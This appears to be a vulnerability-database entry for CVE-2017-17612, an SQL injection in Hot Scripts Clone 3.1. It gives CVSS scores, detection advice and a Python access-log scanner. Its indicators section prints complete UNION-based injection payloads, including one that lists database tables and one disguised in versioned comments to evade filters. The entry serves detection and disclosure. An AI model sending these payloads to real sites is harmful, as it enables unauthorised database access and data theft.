CVE-2017-17612
published 2017-12-13

CVE-2017-17612: Hot Scripts Clone 3.1 has SQL Injection via the /categories subctid or mctid parameter.

Priority: P260 · critical · 9.8 (CVSS 3.0)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 3.66% (88.2th percentile)
Hot Scripts Clone 3.1 has SQL Injection via the /categories subctid or mctid parameter.

Affected

1 range
Vendor | Product | Version range | Fixed in
hot_scripts_clone_project | hot_scripts_clone | |

Detection & IOCs (extracted from sources)

url: http://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
url: http://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
command: -yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
command: -Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
command: -Y12h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
path: /categories
  • Monitor HTTP requests to the /categories endpoint for SQL injection patterns in the 'subctid' parameter, specifically looking for UNION-based payloads with quote characters and comment sequences (--+-).
  • Monitor HTTP requests to the /categories endpoint for SQL injection patterns in the 'mctid' parameter, including UNION ALL SELECT payloads targeting INFORMATION_SCHEMA.TABLES.
  • Detect MySQL inline comment obfuscation technique using /*!08888UNION*/, /*!08888ALL*/, /*!08888SELECT*/ versioned comment syntax used to bypass WAF/filters in the mctid and subctid parameters.
  • Detect combined injection attempts where both subctid and mctid parameters are supplied simultaneously with SQL payloads.
  • Exploit PoC uses [PATH] as a placeholder for the application's installation subdirectory; the /categories endpoint may be at a non-root path depending on deployment.
  • CVE was assigned N/A in the original exploit submissions; the CVE-2017-17612 assignment came later via NVD and covers version 3.1, while exploit EDB-43916 targets version 1.0 of the same product.
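
The monitoring described in the bullets above can be prototyped over web access logs as follows. This is an added example, not part of the original entry or of any vendor rule set; the rule names, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

PARAMS = ("subctid", "mctid")  # parameters named in the advisory
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# MySQL versioned comment: /*!08888UNION*/ is executed as UNION by the server,
# but "08888UNION" has no word boundary, so a naive \bunion\b rule misses it.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
RULES = {
    "quote": re.compile(r"'"),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "information_schema": re.compile(r"information_schema", re.I),
    "sql_comment": re.compile(r"--\s"),
}

def inspect_request(target):
    """Return {param: [rule names]} for suspicious subctid/mctid values."""
    parts = urlsplit(target)
    # The app may live under a subdirectory, so match on the path suffix.
    if not parts.path.rstrip("/").endswith("/categories"):
        return {}
    findings = {}
    # parse_qs percent-decodes and turns '+' into spaces before matching.
    for name, values in parse_qs(parts.query).items():
        for raw in values if name in PARAMS else ():
            hits = ["versioned_comment"] if VERSIONED.search(raw) else []
            value = VERSIONED.sub(r" \1 ", raw)  # unwrap before keyword rules
            hits += [rule for rule, rx in RULES.items() if rx.search(value)]
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings

def scan(log_lines):
    """Return (request target, findings) for every log line that alerts."""
    alerts = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m and (found := inspect_request(m.group(1))):
            alerts.append((m.group(1), found))
    return alerts

# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Dec/2017:10:00:00 +0000] "GET /categories?subctid=12&mctid=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Dec/2017:10:00:05 +0000] "GET /categories?subctid=-1\'++UNION+ALL+SELECT+USER()--+- HTTP/1.1" 200 812',
    '203.0.113.9 - - [13/Dec/2017:10:00:09 +0000] "GET /shop/categories?mctid=-1\'+/*!08888UNION*/+/*!08888SELECT*/+1--+- HTTP/1.1" 200 799',
    '203.0.113.9 - - [13/Dec/2017:10:00:12 +0000] "GET /categories?subctid=1\'--+-&mctid=1\'--+- HTTP/1.1" 200 640',
    '203.0.113.7 - - [13/Dec/2017:10:00:20 +0000] "GET /search?q=union+select HTTP/1.1" 200 2210',
]
```

A finding that contains both `subctid` and `mctid` keys corresponds to the combined-parameter case in the last detection bullet.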

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P